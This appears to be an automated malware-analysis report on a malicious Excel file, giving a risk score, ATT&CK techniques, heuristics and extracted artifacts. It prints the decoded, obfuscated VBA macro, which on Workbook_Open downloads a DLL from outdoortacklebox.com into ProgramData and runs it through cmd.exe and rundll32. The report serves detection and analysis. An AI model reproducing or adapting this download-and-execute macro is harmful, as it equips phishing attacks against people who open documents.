MALICIOUS
100
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is an Excel document containing a Workbook_Open VBA macro, which is a common technique for executing malicious code upon opening. The VBA code is heavily obfuscated but appears to construct a URL, 'https://outdoortacklebox.com/1.dll', likely to download a second-stage payload. It also attempts to write to startup directories, suggesting an attempt at persistence. The presence of a Workbook_Open macro and the obfuscated code strongly indicate a malicious intent, likely delivered via spearphishing.
Heuristics 3
-
VBA project inside OOXML medium 2 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 50656 bytes |
SHA-256: 296a3896a5604ce6cc0b0977a6ded255e378bb83b8ab84bb1e0a060eb4896362 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ЭтаКнига"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub chk2wj3k()
With Application.CommandBars(1).Controls.Add(Type:=msoControlPopup, Temporary:=True)
.Caption = "?????"
With .Controls
With .Add(Type:=msoControlButton)
.FaceId = 280
.Caption = "????????"
.OnAction = "??????1"
End With
With .Add(Type:=msoControlPopup)
.Caption = "???? ??????"
With .Controls
With .Add(Type:=msoControlButton)
.FaceId = 1643
.Caption = "??????????"
.OnAction = "??????2"
End With
With .Add(Type:=msoControlButton)
.FaceId = 1000
.Caption = "??????????"
.OnAction = "??????3"
End With
End With
End With
End With
End With
End Sub
Public Sub nvlk5lk()
Dim fojn As Long
UserForm1.Label1.Caption = "ht"
UserForm1.OptionButton1.Caption = UserForm1.Label1.Caption + "tps:/"
UserForm1.OptionButton2.Caption = UserForm1.OptionButton1.Caption + "/outdo"
UserForm1.OptionButton2.Tag = UserForm1.OptionButton2.Caption + "ortacklebox.c"
UserForm1.Label1.Caption = UserForm1.OptionButton2.Tag + "om/1.d"
UserForm1.Label1.Caption = UserForm1.Label1.Caption + "ll"
UserForm1.OptionButton1.Caption = "C"
UserForm1.OptionButton2.Caption = UserForm1.OptionButton1.Caption + ":\Pro"
UserForm1.OptionButton2.Tag = UserForm1.OptionButton2.Caption + "gramD"
UserForm1.Label1.Tag = UserForm1.OptionButton2.Tag + "ata\ryui2.d"
UserForm1.OptionButton3.Caption = UserForm1.Label1.Tag + "ll"
fojn = uro2ihol.gfwer23(0, UserForm1.Label1.Caption, UserForm1.OptionButton3.Caption, 0, 0)
If fojn = 0 Then
UserForm1.OptionButton3.Caption = "Cxava:xava\Wxavaindoxavaws\xavaSyxavastxavaemxava3xava2\xavacmxavad.exxavae"
UserForm1.OptionButton3.Caption = uro2ihol.jgflk4(UserForm1.OptionButton3.Caption, "xava")
UserForm1.OptionButton3.Tag = "/betuc chobetuicbetue /betuC Y /betuN /D Ybetu /T 3betu0 & stabeturt Cbetu:\Wbetuinbetudobetuws\betuSbetuysbetutbetuem3betu2\rbetuundbetullbetu3betu2.betuexbetue Cbetu:\betuProbetugrabetumDbetuatbetua\beturbetutewbetudbetu.dbetull,DbetulbetulRebetugibetustbetuerSbetuerbetuvebetur"
UserForm1.OptionButton3.Tag = uro2ihol.jgflk4(UserForm1.OptionButton3.Tag, "betu")
uro2ihol.adfeq346w45 UserForm1.OptionButton3.Caption, UserForm1.OptionButton3.Tag
End If
End Sub
Private Sub Workbook_Open()
Dim x, y, z As Double
Dim hnfkj As String
nvlk5lk
hnfkj = UserForm1.OptionButton3.Caption
End Sub
Sub sdfml2342pol3(fewo4ih As String, jgdlfk As String)
fewo4ih = fewo4ih + " "
fewo4ih = fewo4ih + jgdlfk
End Sub
With MenuBars("Worksheet").Menus.Add(Caption:="?????")
.MenuItems.Add Caption:="????????", OnAction:="??????1"
With .MenuItems.AddMenu(Caption:="???? ??????")
.MenuItems.Add Caption:="??????????", OnAction:="??????2"
.MenuItems.Add Caption:="??????????", OnAction:="??????3"
End With
End With
End Sub
Sub ito3uhi4uh()
With MenuBars("Worksheet").Menus.Add(Caption:="?????")
.MenuItems.Add Caption:="????????", OnAction:="??????1"
With .MenuItems.AddMenu(Caption:="???? ??????")
With .MenuItems.Add(Caption:="??????????")
.OnAction = "??????2"
End With
With .MenuItems.Add(Caption:="??????????")
.OnAction = "??????3"
End With
End With
End With
End Sub
Attribute VB_Name = "Лист1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_G
... (truncated)
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 147968 bytes |
SHA-256: ab1c1f554d29b2fc9cbb0a6677d75d8a9d940aae91d988c19563f01d04149779 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.